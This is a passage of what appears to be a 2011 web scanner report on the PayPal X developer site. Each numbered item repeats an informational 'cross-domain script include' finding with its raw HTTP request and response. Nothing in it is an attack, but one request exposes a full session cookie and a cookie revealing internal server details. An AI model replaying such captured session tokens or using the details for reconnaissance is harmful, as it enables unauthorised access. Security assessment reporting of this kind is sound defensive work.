Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=103642 t=1313157517314351
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.194. https://www.x.com/message/215264

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215264

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215264 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c35333831373b332c3132333639353b332c3130323736323b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b312c35333838343b312c35333937373b312c35333135383b312c34373636333b312c35333137323b312c35343035383b312c35343036353b312c35333235323b312c35333331323b312c35333331393b3130322c313130363b3130322c313137363b3130322c313430313b3130322c313230343b3130322c313131363b3130322c313231363b3130322c323334363b3130322c313433313b3130322c313337343b3130322c313333323b33382c363333363b; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=198038 t=1313157518364086
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.195. https://www.x.com/message/215276

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215276

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215276 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:38 GMT; Path=/
Vary: User-Agent
JP: D=113550 t=1313157518862899
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.196. https://www.x.com/message/215291

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /message/215291

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /message/215291 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:58:36 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:58:37 GMT; Path=/
Vary: User-Agent
JP: D=173612 t=1313157516935709
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.197. https://www.x.com/people

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:54:23 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=3394146 t=1313157260109910
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.198. https://www.x.com/people/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/ HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:50 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=2685593 t=1313157107815185
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.199. https://www.x.com/people/BaldGeek

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/BaldGeek HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/community/xcommerce-blogs?view=blog
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323237363b31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b332c35333735313b332c36303039313b332c3133363935343b332c3133383538323b332c3133373131353b; Expires=Sun, 11-Sep-2011 13:38:49 GMT; Path=/
Vary: User-Agent
JP: D=151430 t=1313156329683258
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.200. https://www.x.com/people/BaldGeek/blog

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/BaldGeek/blog

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/BaldGeek/blog HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: User-Agent
JP: D=127143 t=1313157109294622
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.201. https://www.x.com/people/CorinneSherman

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/CorinneSherman

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/CorinneSherman HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:54 GMT; Path=/
Vary: User-Agent
JP: D=153786 t=1313157114086096
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.202. https://www.x.com/people/GiancarloUk2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/GiancarloUk2

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/GiancarloUk2 HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:28 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38383139383b332c3131353037373b332c3130383730353b332c3131303734313b332c3131303831343b332c38323534333b332c3131353130373b332c38353530363b332c3131313737343b332c38373839383b; Expires=Sun, 11-Sep-2011 13:52:29 GMT; Path=/
Vary: User-Agent
JP: D=109527 t=1313157149159421
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.203. https://www.x.com/people/IndieReign

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/IndieReign

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/IndieReign HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:30 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c3134303730373b332c38383139383b332c38373839383b332c3134313133383b332c38353530363b332c3134303532383b332c3131353130373b332c3131303734313b332c3131313737343b332c3131353037373b; Expires=Sun, 11-Sep-2011 13:52:30 GMT; Path=/
Vary: User-Agent
JP: D=98253 t=1313157150770204
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.204. https://www.x.com/people/JasonVenner

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/JasonVenner

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/JasonVenner HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:49 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:51:49 GMT; Path=/
Vary: User-Agent
JP: D=146802 t=1313157109565171
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.205. https://www.x.com/people/MrcheckAPX

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/MrcheckAPX

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/MrcheckAPX HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c38343138313b332c38323134383b332c38313633393b332c37383732323b332c36373839373b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:48 GMT; Path=/
Vary: User-Agent
JP: D=97089 t=1313157168042186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.206. https://www.x.com/people/PP_Igor

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_Igor

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_Igor HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:09 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:09 GMT; Path=/
Vary: User-Agent
JP: D=77818 t=1313157129602041
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.207. https://www.x.com/people/PP_MTS_Andre

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Andre

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Andre HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:05 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:06 GMT; Path=/
Vary: User-Agent
JP: D=85787 t=1313157126041615
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.208. https://www.x.com/people/PP_MTS_Chad

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Chad

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Chad HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=167980 t=1313157123846369
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.209. https://www.x.com/people/PP_MTS_GuidoT

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_GuidoT

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_GuidoT HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:07 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:07 GMT; Path=/
Vary: User-Agent
JP: D=96030 t=1313157127847926
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.210. https://www.x.com/people/PP_MTS_Magarvin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Magarvin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Magarvin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:03 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:04 GMT; Path=/
Vary: User-Agent
JP: D=130947 t=1313157124385931
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.211. https://www.x.com/people/PP_MTS_Patrick

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PP_MTS_Patrick

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PP_MTS_Patrick HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:12 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=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; Expires=Sun, 11-Sep-2011 13:52:13 GMT; Path=/
Vary: User-Agent
JP: D=143994 t=1313157132945144
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.212. https://www.x.com/people/PayPalXadmin

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPalXadmin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPalXadmin HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:52:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b332c323030313b332c313b332c38393734373b332c3133393930333b332c3134303730373b332c3134303532383b332c3134313133383b332c38383139383b332c38373839383b332c38353530363b33382c363333363b; Expires=Sun, 11-Sep-2011 13:52:39 GMT; Path=/
Vary: User-Agent
JP: D=96924 t=1313157159108661
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="https://www.paypal-labs.com/js/tabcontent.js">

/***********************************************
* Tab Content script v2.2- ... Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Dr
...[SNIP]...
<http://www.omniture.com/> -->
<script type="text/javascript" src="https://www.paypalobjects.com/js/site_catalyst/pp_jscode_080706.js">
</script>
...[SNIP]...

7.213. https://www.x.com/people/PayPal_Carolyn

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /people/PayPal_Carolyn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /people/PayPal_Carolyn HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:51 GMT
Server: Apache-Coyote/1.1
